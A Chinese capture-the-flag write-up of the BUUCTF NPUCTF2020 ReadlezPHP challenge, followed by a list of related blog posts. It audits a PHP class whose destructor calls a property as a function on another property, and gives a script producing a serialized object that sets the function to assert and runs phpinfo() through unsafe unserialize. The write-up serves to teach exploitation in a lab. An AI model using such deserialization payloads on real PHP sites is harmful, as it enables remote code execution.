127,【3】 buuctf [NPUCTF2020]ReadlezPHP

进入靶场

吓我一跳

查看源码

点击

审计

php 复制代码
<?php

// 定义一个名为 HelloPhp 的类,该类可能用于执行与日期格式化相关的操作
class HelloPhp
{
    // 定义一个公共属性 $a,用于存储日期格式化的模板
    public $a;
    // 定义一个公共属性 $b,用于存储要调用的函数名
    public $b;

    // 构造函数,当创建 HelloPhp 类的对象时会自动调用
    public function __construct()
    {
        // 将日期格式化模板 "Y-m-d h:i:s" 赋值给属性 $a
        // "Y-m-d h:i:s" 表示年-月-日 时:分:秒 的格式
        $this->a = "Y-m-d h:i:s";
        // 将 PHP 的日期函数名 "date" 赋值给属性 $b
        $this->b = "date";
    }

    // 析构函数,当对象被销毁时会自动调用
    public function __destruct()
    {
        // 将属性 $a 的值赋给局部变量 $a
        $a = $this->a;
        // 将属性 $b 的值赋给局部变量 $b
        $b = $this->b;
        // 调用以 $b 为函数名的函数,并将 $a 作为参数传递给该函数
        // 由于 $b 为 "date",$a 为日期格式化模板,所以这里实际上是调用 date 函数进行日期格式化
        // 最后将格式化后的日期字符串输出
        echo $b($a);
    }
}

// 创建一个 HelloPhp 类的对象 $c
$c = new HelloPhp;

// 检查 $_GET 超全局数组中是否存在名为 'source' 的参数
if (isset($_GET['source'])) {
    // 如果存在 'source' 参数,则使用 highlight_file 函数高亮显示当前 PHP 文件的源代码
    highlight_file(__FILE__);
    // 终止脚本的执行,并返回状态码 0
    die(0);
}

// 使用 @ 符号抑制可能出现的错误信息
// 尝试对 $_GET 超全局数组中名为 "data" 的参数进行反序列化操作
// 并将反序列化后的结果赋值给变量 $ppp
@$ppp = unserialize($_GET["data"]);

我们需要通过get方式传参给data参数,并进行序列化操作

同时b包括函数名,a包括对应参数

system() 是 PHP 中的一个函数,其作用是执行外部程序,并将执行结果输出

但尝试了不行,换一个

assert() 函数在 PHP 中既可以用于调试和检查条件是否成立,也可以将传入的参数当作 PHP 代码来执行

此处就是利用了他的第二个性质

phpinfo() 函数用于输出 PHP 的配置信息

php 复制代码
<?php
class HelloPhp
{
    public $a = "phpinfo()";
    public $b = "assert";
}
$c = new HelloPhp();
echo serialize($c);
?> 

O:8:"HelloPhp":2:{s:1:"a";s:10:"phpinfo()";s:1:"b";s:6:"assert";}

相关推荐
m0_738120725 小时前
CTFshow系列——命令执行web38-40
前端·windows·安全·web安全
网络安全大学堂9 小时前
【黑客技术零基础入门】PHP环境搭建、安装Apache、安装与配置MySQL(非常详细)零基础入门到精通,收藏这一篇就够
安全·web安全·计算机·网络安全·黑客·信息安全·程序员
卓码软件测评11 小时前
【网站测试:CORS配置错误引发的安全风险及测试】
功能测试·安全·web安全·压力测试·可用性测试·安全性测试
吱吱企业安全通讯软件12 小时前
吱吱企业通讯软件保证内部通讯安全,搭建数字安全体系
大数据·网络·人工智能·安全·信息与通信·吱吱办公通讯
云边云科技14 小时前
零售行业新店网络零接触部署场景下,如何选择SDWAN
运维·服务器·网络·人工智能·安全·边缘计算·零售
中科数测16 小时前
开源软件惊现高危漏洞,中科固源解决方案利用GDB 调试成关键 “排雷兵”,实战运用指南
安全
hui函数17 小时前
Flask-WTF表单验证全攻略
后端·python·flask·web·表单验证
AAA修煤气灶刘哥18 小时前
《从 0 到 1 上手:RBAC+SpringSecurity 权限管理教程》
java·后端·安全
深盾安全1 天前
使用Frida实现Hook,修改接口调用
安全
2301_801673011 天前
8.19笔记
网络·安全